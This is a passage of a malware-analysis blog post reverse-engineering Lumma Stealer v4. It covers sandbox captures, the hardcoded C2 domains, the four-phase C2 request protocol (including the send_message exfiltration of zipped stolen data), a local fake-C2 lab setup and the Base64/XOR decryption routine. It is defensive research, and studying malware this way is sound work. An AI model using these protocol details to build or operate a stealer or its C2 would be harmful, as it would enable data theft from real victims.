  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;static analysis - PE-Bear ASLR&quot; title=&quot;&quot; src=&quot;/website/static/f2cb0091690d60fe9b26034349a15e31/610c0/static%20analysis%20-%20PE-Bear%20ASLR.png&quot; srcset=&quot;/website/static/f2cb0091690d60fe9b26034349a15e31/804b2/static%20analysis%20-%20PE-Bear%20ASLR.png 384w,
/website/static/f2cb0091690d60fe9b26034349a15e31/e5715/static%20analysis%20-%20PE-Bear%20ASLR.png 768w,
/website/static/f2cb0091690d60fe9b26034349a15e31/610c0/static%20analysis%20-%20PE-Bear%20ASLR.png 1295w&quot; sizes=&quot;(max-width: 1295px) 100vw, 1295px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;p&gt;Both ASLR deactivation and memory realignment steps were systematically applied as preliminary operations to all analyzed samples, forming the basis for all subsequent steps of the analysis.&lt;/p&gt;
&lt;p&gt;&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;h1&gt;&lt;a id=&quot;communication-analysis-lumma-v4&quot;&gt;&lt;/a&gt;Communication analysis (lumma v4)&lt;/h1&gt;
&lt;p&gt;To understand the behavior of malware, especially its communication logic, it is necessary to analyze the structure and flow of its network activity. Detecting only outgoing connections is not enough; it is essential to analyze more deeply the sequence of interactions and the conditions that govern them.&lt;/p&gt;
&lt;p&gt;This chapter analyzes two network captures obtained from CAPEv2 sandbox executions. In both cases, the sandbox is configured to redirect all outbound traffic through a controlled channel, ensuring a secure and isolated environment.&lt;/p&gt;
&lt;p&gt;In the first scenario, all traffic is routed to &lt;strong&gt;INetSim&lt;/strong&gt;, a tool that emulates common internet services (HTTP, DNS, FTP, etc.) and returns fake but consistent responses. This setup allows the malware to iterate through its list of embedded C2 domains, progressing only when a response is deemed invalid. As a result, it becomes possible to systematically enumerate all hardcoded endpoints and reconstruct the extent of the malicious infrastructure.&lt;/p&gt;
&lt;p&gt;In the second scenario, the sandbox directs traffic through a &lt;strong&gt;secure proxy&lt;/strong&gt; with real internet access. This allows the malware to complete its communication stages and retrieve live responses from its C2 server, while still preserving analyst anonymity and containment.&lt;/p&gt;
&lt;p&gt;By comparing these two execution scenarios, it is possible to reconstruct the malware’s communication protocol in detail.&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;inetsim&quot;&gt;&lt;/a&gt;InetSim&lt;/h2&gt;
&lt;p&gt;During execution, the sample uses the &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/api/winhttp/&quot;&gt;WinHTTP API&lt;/a&gt; to initiate connections and transmit data. The following functions are observed:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;WinHttpOpen&lt;/code&gt; – initializes a session handle&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;WinHttpConnect&lt;/code&gt; – creates a connection to a target domain over port 443&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;WinHttpOpenRequest&lt;/code&gt; – prepares an HTTP &lt;code class=&quot;language-text&quot;&gt;POST&lt;/code&gt; request to the &lt;code class=&quot;language-text&quot;&gt;/api&lt;/code&gt; endpoint with parameter &lt;code class=&quot;language-text&quot;&gt;act=life&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;WinHttpSendRequest&lt;/code&gt; – sends the HTTP request to the server&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;WinHttpReceiveResponse&lt;/code&gt; – receives the response from the server&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The malware contacted the following domains in sequence:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;pragapin.sbs
repostebhu.sbs
thinkyyokej.sbs
ducksringjk.sbs
explainvees.sbs
brownieyuz.sbs
rottieud.sbs
relalingj.sbs
tamedgeesy.sbs&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Each domain is contacted via a &lt;code class=&quot;language-text&quot;&gt;POST /api&lt;/code&gt; request carrying &lt;code class=&quot;language-text&quot;&gt;act=life&lt;/code&gt; as its payload. Since INetSim provides valid HTTP-level responses (e.g., &lt;code class=&quot;language-text&quot;&gt;HTTP/1.1 200 OK&lt;/code&gt;), the malware proceeds through the full WinHTTP call chain. However, the application-layer content does not match the expected format, so the sample marks the domain as inactive and moves on.&lt;/p&gt;
&lt;p&gt;After exhausting the predefined C2 list, the malware issues a &lt;code class=&quot;language-text&quot;&gt;GET&lt;/code&gt; request to a &lt;strong&gt;Steam profile&lt;/strong&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;steamcommunity.com/profiles/76561199724331900&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This suggests a fallback mechanism: when no hardcoded C2 responds appropriately, the malware attempts to retrieve additional information from a third-party platform. INetSim makes it possible to capture this entire process safely and deterministically, exposing the embedded infrastructure.&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;proxy&quot;&gt;&lt;/a&gt;Proxy&lt;/h2&gt;
&lt;p&gt;As in the previous case, the malware employs the &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/api/winhttp/&quot;&gt;WinHTTP API&lt;/a&gt; to manage outbound HTTPS requests.&lt;/p&gt;
&lt;p&gt;In this instance, the malware attempts to contact the same list of C2 domains as in the previous execution, but does not receive valid responses. It then sends a &lt;code class=&quot;language-text&quot;&gt;GET&lt;/code&gt; request to the Steam profile page and subsequently continues communication with a new domain: &lt;code class=&quot;language-text&quot;&gt;marshal-zhukov.com&lt;/code&gt;. Important to note is that this address is not part of the original list and is likely retrieved dynamically from the Steam page.&lt;/p&gt;
&lt;p&gt;Below is a summary of the communication flow. (&lt;em&gt;HTTP headers are only shown in the first request to keep the text concise.&lt;/em&gt;)&lt;/p&gt;
&lt;h3&gt;&lt;a id=&quot;summary-communication-flow&quot;&gt;&lt;/a&gt;Summary communication flow&lt;/h3&gt;
&lt;h4&gt;&lt;a id=&quot;actlife&quot;&gt;&lt;/a&gt;&lt;code class=&quot;language-text&quot;&gt;act=life&lt;/code&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Client&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Method: &lt;code class=&quot;language-text&quot;&gt;POST /api&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Headers:
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;Body: &lt;code class=&quot;language-text&quot;&gt;act=life&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Server&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Headers:
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=mdd1ko4qf5gsb9idied577rfbn; Max-Age=9999999; path=/&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;Body: &lt;code class=&quot;language-text&quot;&gt;ok&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;a id=&quot;actrecive_message&quot;&gt;&lt;/a&gt;&lt;code class=&quot;language-text&quot;&gt;act=recive_message&lt;/code&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Client&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;act=recive_message&amp;amp;ver=4.0&amp;amp;lid=BVnUqo--@StayAway777&amp;amp;j=&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Server&lt;/strong&gt;
A very long base64-encoded string, likely containing encrypted content.&lt;/p&gt;
&lt;h4&gt;&lt;a id=&quot;actsend_message-there-are-multiple-requests&quot;&gt;&lt;/a&gt;&lt;code class=&quot;language-text&quot;&gt;act=send_message&lt;/code&gt; &lt;strong&gt;(there are multiple requests)&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Client&lt;/strong&gt;
Multipart form data including the following fields:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;hwid  -&gt; T4U67W9CV4H5D63KM6SXSEX5UPD59TSK
pid   -&gt; 2
lid   -&gt; BVnUqo--@StayAway777
act   -&gt; send_message
file  -&gt; (ZIP archive, starts with PK magic number)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Server&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;ok [an IP address]&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;&lt;a id=&quot;actget_message&quot;&gt;&lt;/a&gt;&lt;code class=&quot;language-text&quot;&gt;act=get_message&lt;/code&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Client&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;act=get_message&amp;amp;ver=4.0&amp;amp;lid=BVnUqo--@StayAway777&amp;amp;j=&amp;amp;hwid=T4U67W9CV4H5D63KM6SXSEX5UPD59TSK&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Server&lt;/strong&gt;
Another short base64-like string.&lt;/p&gt;
&lt;h3&gt;&lt;a id=&quot;analysis-of-communication-phases&quot;&gt;&lt;/a&gt;Analysis of communication phases&lt;/h3&gt;
&lt;p&gt;The presence of the &lt;code class=&quot;language-text&quot;&gt;act=&lt;/code&gt; parameter allows us to clearly distinguish four distinct phases within the communication protocol:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;act=life&lt;/code&gt;: likely a simple reachability check, as suggested by the minimal response (&lt;code class=&quot;language-text&quot;&gt;ok&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;act=recive_message&lt;/code&gt;: possibly a registration step. The server responds with a long base64 string, which could contain configuration or commands information.&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;act=send_message&lt;/code&gt;: the malware sends exfiltrated data. The presence of a ZIP file header (&lt;code class=&quot;language-text&quot;&gt;PK&lt;/code&gt;) indicates structured, possibly compressed, data theft.&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;act=get_message&lt;/code&gt;: the malware may receive additional commands. The format is similar to stage 2 but shorter.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In addition, the presence of the &lt;code class=&quot;language-text&quot;&gt;ver=4.0&lt;/code&gt; argument may suggest that the malware communicates its current version to the server for identification purposes. For the time being, we refer to this version as version 4.&lt;/p&gt;
&lt;p&gt;At this point, the structure of the protocol is partially understood. However, the actual content of the base64 responses remains unreadable after decoding. This suggests that the data may be encrypted after base64 encoding or that a custom base64 alphabet is used.&lt;/p&gt;
&lt;p&gt;To confirm this, it is necessary to reverse engineer the malware and analyze the runtime behavior of the relevant decoding and decryption routines.&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;prerequisites-for-advanced-analysis&quot;&gt;&lt;/a&gt;Prerequisites for Advanced Analysis&lt;/h2&gt;
&lt;p&gt;To support the analysis workflow, a &lt;a href=&quot;https://federicofantini.github.io/TheTrackerShow/scripts/fakenet/01-lummastealer_v4_fakenet/&quot;&gt;local HTTPS server&lt;/a&gt; was configured to emulate the malware’s C2 communication. This is especially useful in advanced stages, where original C2 servers are often offline. Lumma Stealer domains tend to be short-lived, making repeatable analysis unreliable without such setup.&lt;/p&gt;
&lt;p&gt;The first contacted domain, according to captured traffic, is &lt;code class=&quot;language-text&quot;&gt;pragapin.sbs&lt;/code&gt;. To maintain continuity, the server was configured to respond under this domain, replaying payloads previously received from &lt;code class=&quot;language-text&quot;&gt;marshal-zhukov.com&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The environment was set up using the following steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Generate the HTTPS certificate:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;batch&quot;&gt;&lt;pre class=&quot;language-batch&quot;&gt;&lt;code class=&quot;language-batch&quot;&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;amp;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;&apos;&lt;/span&gt;C:\Program Files\OpenSSL-Win64\bin\openssl.exe&lt;span class=&quot;token punctuation&quot;&gt;&apos;&lt;/span&gt; req -x509 -nodes -days 365 -newkey rsa:2048 -keyout pragapin.sbs-key.pem -out pragapin.sbs-cert.pem&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Install and trust the certificate on Windows:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Open Microsoft Management Console (&lt;code class=&quot;language-text&quot;&gt;mmc.exe&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Add the &quot;Certificates&quot; snap-in for both &lt;em&gt;Current User&lt;/em&gt; and &lt;em&gt;Local Computer&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;Navigate to:
&lt;code class=&quot;language-text&quot;&gt;Trusted Root Certification Authorities &gt; Certificates&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Right-click &gt; All Tasks &gt; Import&lt;/li&gt;
&lt;li&gt;Import the previously generated &lt;code class=&quot;language-text&quot;&gt;pragapin.sbs-cert.pem&lt;/code&gt; file&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Redirect the C2 domain locally:&lt;/strong&gt;
Add the following entry to the system&apos;s hosts file &lt;code class=&quot;language-text&quot;&gt;C:\Windows\System32\drivers\etc\hosts&lt;/code&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;127.0.0.1 pragapin.sbs&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;To verify that the custom HTTPS server correctly handles malware communication, the analysis was complemented with a &lt;a href=&quot;https://federicofantini.github.io/TheTrackerShow/scripts/x64dbg/02-lummastealer_interactions/&quot;&gt;debugger script for x64dbg&lt;/a&gt;. This script automates the placement of breakpoints on key WinHTTP functions involved in network communication, such as &lt;code class=&quot;language-text&quot;&gt;WinHttpOpen&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;WinHttpConnect&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;WinHttpOpenRequest&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;WinHttpSendRequest&lt;/code&gt;, and &lt;code class=&quot;language-text&quot;&gt;WinHttpReceiveResponse&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Since &lt;code class=&quot;language-text&quot;&gt;winhttp.dll&lt;/code&gt; is loaded dynamically, breakpoints cannot be placed at the start of execution. Guided by the CAPEv2 trace, which confirmed the use of the WinHTTP API, the script monitors calls to &lt;code class=&quot;language-text&quot;&gt;LoadLibraryExW&lt;/code&gt; and sets breakpoints only after detecting the load of &lt;code class=&quot;language-text&quot;&gt;winhttp.dll&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;This setup provides a clean and reproducible environment to monitor API-level interactions and verify that the malware follows the expected communication flow with the emulated C2.&lt;/p&gt;
&lt;p&gt;&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;h1&gt;&lt;a id=&quot;second-stage-analysis&quot;&gt;&lt;/a&gt;Second stage analysis&lt;/h1&gt;
&lt;h2&gt;&lt;a id=&quot;identifying-the-decryption-routine&quot;&gt;&lt;/a&gt;Identifying the decryption routine&lt;/h2&gt;
&lt;p&gt;I begin analyzing the second stage by opening the memory-dumped binary obtained from the first phase directly in Ghidra. The image I create summarizes the logical path I follow during this investigation. Since the malware is deeply obfuscated and requires several debugger sessions, the flow is not strictly linear. Rather, it combines the most relevant insights collected across multiple executions.&lt;/p&gt;
&lt;div class=&quot;img-big&quot; align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1507px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/3e55e5b4932c9422de5f7825ef824b9a/b880f/advanced%20static%20analysis%20-%20Ghidra%203.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 67.1875%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAIAAAAmMtkJAAAACXBIWXMAAAsTAAALEwEAmpwYAAACjElEQVR42o2Oa0/aUBjH+wkWlZtIe1ooxRY1TEXFLYiLiV9gE1A/wLJ9sWV7s2R7uXfL1GwUuZVCodxKrxSQSwVkMlb3yixZsn9+OTnPc/J7zgONx+PReHL7j4xGo2G/b7TbiigWuIdIkjgcmr2++QS9PIlFXhxFDg8PIpHHmJ1wOHx0fJxLJue93qTbHfR6vX5/aBjjyd1kOr2fzaDtvWcAReyO5b9wLDutNjsC0O+XV/PptCMKpVRCYHN1JsPnUvXrREtsQvvhAx9F4oQPoNhjUMwNA5QgfJcJ2pjPU02ZubqQ8lkhmxGu6c+fvhX4JrQXChHkKk5SCALgR5h/umDYg3tpmp4/yEqaTukcr7AlpcB/uOBSFRHaDu66PRi1TnoJHDNvJph5uE3MEX/kpCnXFCWdyra4slIsSSz78SvD1CRoK7hD+PCNgN9HEh6vB/OYvht1P/gIinp9RJKmf/281zS1mGE0rqIUyipf+5ISeKULBXf3CP8a9XQbpyhzVQQAGAAXQGEUWzEL3PsjkZj1OgO5easphqZOdL3f6citVvumBwV3dolVkgxs+XFifcW14YJ9MILDCIEAzLnynPJXC8VBW23kr9u6VG8w/W5Jb3LlaolXFCgU2qfIta1VageGNxEQQMAmAEGA+jE3iYAQSdVK5bvRQKywulZniu9l+d2NmjF0+X4yhNYCmwt2p9Nqd1gdNqvDbnFYLDbb4tKCxfpkccnqWGby+dndUKwUdLWmybmpUZcaHJOmdU2BXr95+yoai5+enZ6ex+NnJrHY6UksFo3HT6LRs/NzQWhossBlM/ViPp3JZ/IlNp1gM3S3pULz/0i1xDXYolQuF7LFMl8TqlxHFcbG4DeGp7BY5mwJ5QAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;advanced static analysis - Ghidra 3&quot; title=&quot;&quot; src=&quot;/website/static/3e55e5b4932c9422de5f7825ef824b9a/b880f/advanced%20static%20analysis%20-%20Ghidra%203.png&quot; srcset=&quot;/website/static/3e55e5b4932c9422de5f7825ef824b9a/804b2/advanced%20static%20analysis%20-%20Ghidra%203.png 384w,
/website/static/3e55e5b4932c9422de5f7825ef824b9a/e5715/advanced%20static%20analysis%20-%20Ghidra%203.png 768w,
/website/static/3e55e5b4932c9422de5f7825ef824b9a/b880f/advanced%20static%20analysis%20-%20Ghidra%203.png 1507w&quot; sizes=&quot;(max-width: 1507px) 100vw, 1507px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;p&gt;On the left side of the disassembly, I identify the binary’s entry point. The code is heavily obfuscated, so I choose to ignore most of the surrounding instructions and focus on segments that can be linked to the malware&apos;s communication behavior. In the previous section, I have already identified four main stages in the communication process, so my goal is to find a function that includes all of them. This helps me drastically narrow down the analysis scope.&lt;/p&gt;
&lt;p&gt;I first examine the function at address &lt;code class=&quot;language-text&quot;&gt;0x40e0b0&lt;/code&gt;. It only performs the initial reachability check to determine whether the C2 server is active. Since it does not handle any of the remaining communication stages, I move on.&lt;/p&gt;
&lt;p&gt;By following the control flow beyond the function at &lt;code class=&quot;language-text&quot;&gt;0x40f920&lt;/code&gt;, I notice that no additional network-related calls are made. This observation leads me to the key target of the second stage analysis: the function located at &lt;code class=&quot;language-text&quot;&gt;0x410aa0&lt;/code&gt;, which appears to handle all the remaining three stages of the communication protocol.&lt;/p&gt;
&lt;p&gt;As soon as this function starts, it invokes another subroutine at address &lt;code class=&quot;language-text&quot;&gt;0x436130&lt;/code&gt;, which performs a series of preparatory operations:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;initializes internal components&lt;/li&gt;
&lt;li&gt;issues a WQL query with &lt;code class=&quot;language-text&quot;&gt;SELECT * FROM Win32_BIOS&lt;/code&gt; to enumerate BIOS information&lt;/li&gt;
&lt;li&gt;retrieves the system’s serial number&lt;/li&gt;
&lt;li&gt;calls &lt;code class=&quot;language-text&quot;&gt;GetVolumeInformationW&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;performs a series of chained calls that finally generate the value used in the communication as &lt;code class=&quot;language-text&quot;&gt;hwid&lt;/code&gt;, a 32-byte hardware identifier&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Following this, another value is accessed from the &lt;code class=&quot;language-text&quot;&gt;.rodata&lt;/code&gt; section. This is the &lt;code class=&quot;language-text&quot;&gt;lid&lt;/code&gt;, and unlike other &lt;code class=&quot;language-text&quot;&gt;hwid&lt;/code&gt; identifier, it is not generated dynamically. It is directly read from a read-only memory, indicating that it is hardcoded. Given that Lumma Stealer follows a Malware-as-a-Service (MaaS) distribution model, it is reasonable to assume that the &lt;code class=&quot;language-text&quot;&gt;lid&lt;/code&gt; parameter serves as a unique identifier for the customer or affiliate who acquired the stealer. In MaaS ecosystems, such identifiers are typically used to associate infections and activity logs with specific clients, enabling usage tracking, build differentiation, or revenue attribution.&lt;/p&gt;
&lt;p&gt;Still within the &lt;code class=&quot;language-text&quot;&gt;.rodata&lt;/code&gt; section, I find additional unusual strings. One of these is passed directly to the function at address &lt;code class=&quot;language-text&quot;&gt;0x436dc0&lt;/code&gt;, suggesting that this call is responsible for some form of transformation or possibly cryptographic processing. This part of the code, renamed &lt;code class=&quot;language-text&quot;&gt;lumma_decryption()&lt;/code&gt;, becomes the focus of the next phase of the investigation.&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;understanding-the-decryption-logic&quot;&gt;&lt;/a&gt;Understanding the Decryption Logic&lt;/h2&gt;
&lt;p&gt;I created the following image to summarize the logical path and provide a detailed view of the decryption routine &lt;code class=&quot;language-text&quot;&gt;lumma_decryption()&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;img-big&quot; align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1382px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/72bceacbd839474fedce19565d0c1043/f868f/advanced%20static%20analysis%20-%20Ghidra%204.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 72.91666666666666%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAIAAABr+ngCAAAACXBIWXMAAAsTAAALEwEAmpwYAAACcUlEQVR42o2RzU8TQRjG92gUlLa73X7sfOzMzs7u7HRboaWFfhkKJQaJxoOoV/VoQpW00ZMeuJhoCC0qaiTxLwESE2Pk7+EjtHVovHAx/eU5vW+eeZ8no+VnS6VytVgqF+cqSoVCcaYw++Pjp8XGYr40dzEvzSvJbO7+3Xvv3ry9mS/Vbi1Imd3c3NQAQql0OpFMjZQ0kymQTO28/yByOQv8mydT6Ugkujg333qxETVNAMDVaxMvNzY0TwrOHQtCC0AAkQURB3CntyPC0EIwBS6URhjpxkKtvvHqdQJCQulUJNpudzQL28xxic0IdtIQEQtQALe6vVIoQ0IzxJHYzqp0ulFR5nYnkULcE1Fdb3c6WsDcaZHLMhFS34WIpVUCtN3tTUs5LWSO+6HjCEoM06zV68/XW5MRAyL7ytWJ9VZLY4z6nqC2QzChiGBIRuau6wtXBpR7iFJo23EzUa5Udr9+e/jo8ZOnzx6srX3f29MwJX7guZwhbNsQqfYEgG6v54mAe57nBw5zFQDCmXzh5ORkOBwOBoPhCA3b0PNCn0vOOFaVVWqItra31VNmwjTiZkw3dCM+ef2G54vj42Pl6ff7gxGa69oizHgywznDGCuvav1598vtlZV6vVapVlXacqVamC3eWV09PT29dBnY2OUBYx5xmE0ciMmUru8fHKjd2dlZ/zLDy2g+o6GUgS+liu5QDyAQ038eHqrd+fn58L9okuBMIAXjDkYcIoEQi8V+7++PZfYpDXzhMcYIcWybqo8xE7/GvAyTJgFpyzTTRlwJmInoxOThmJcbzebS8vLC0lLjQs1Gc7lcq/05OhrH/BdqsIeAYcrvOQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;advanced static analysis - Ghidra 4&quot; title=&quot;&quot; src=&quot;/website/static/72bceacbd839474fedce19565d0c1043/f868f/advanced%20static%20analysis%20-%20Ghidra%204.png&quot; srcset=&quot;/website/static/72bceacbd839474fedce19565d0c1043/804b2/advanced%20static%20analysis%20-%20Ghidra%204.png 384w,
/website/static/72bceacbd839474fedce19565d0c1043/e5715/advanced%20static%20analysis%20-%20Ghidra%204.png 768w,
/website/static/72bceacbd839474fedce19565d0c1043/f868f/advanced%20static%20analysis%20-%20Ghidra%204.png 1382w&quot; sizes=&quot;(max-width: 1382px) 100vw, 1382px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;p&gt;This function accepts an encrypted buffer as input and writes the output to a second buffer passed as an argument. As shown on the left side of the image, the function begins by calculating the length of the encrypted input and then estimates the length of the decoded output.&lt;/p&gt;
&lt;p&gt;Immediately afterward, the function invokes a decoding subroutine. Given the structure of the ciphertext, I initially suspected that it performed Base64 decoding. To validate this hypothesis and rule out the use of custom alphabets, I extracted the relevant pseudocode as presented by Ghidra, applied some manual adjustments, and reimplemented it in Python. The complete script is available &lt;a href=&quot;https://federicofantini.github.io/TheTrackerShow/scripts/python/01-lummastealer_v4_base64_decode_proof/&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I then performed a one-to-one comparison between this Python implementation and the output of Python’s standard Base64 decoding function. The results are identical for all hardcoded strings extracted from the binary. This confirms that the decoding routine is just Base64.&lt;/p&gt;
&lt;p&gt;Returning to the main decryption function, the next operation copies the first 32 bytes of the decoded buffer into a dedicated memory region, which serves as the decryption key. Following this, the &lt;code class=&quot;language-text&quot;&gt;len&lt;/code&gt; variable is reduced by 32, and &lt;code class=&quot;language-text&quot;&gt;data_pointer&lt;/code&gt; is updated to point precisely to the beginning of the payload + 32 bytes.&lt;/p&gt;
&lt;p&gt;The bottom part of the function, highlighted in red in the image, contains the loop that performs the actual decryption. As before, I converted this logic into a standalone Python script for clarity. The complete script is available &lt;a href=&quot;https://federicofantini.github.io/TheTrackerShow/scripts/python/02-lummastealer_v4_xor_decryption_proof/&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;To ensure the correctness of the analysis, I systematically compared the translated logic against a standard implementation of a block-wise XOR operation using a 32-byte key. In order to eliminate potential edge cases, I developed two nested loops designed to exhaustively iterate over all possible input combinations and verify that the outputs remained consistent across both implementations. The results of this comparison confirm the functional equivalence of the two routines.&lt;/p&gt;
&lt;p&gt;This method echoes the principle of duck typing: if it acts like an XOR cipher, outputs like an XOR cipher, and structurally matches an XOR cipher, then we can reasonably conclude it is one.&lt;/p&gt;
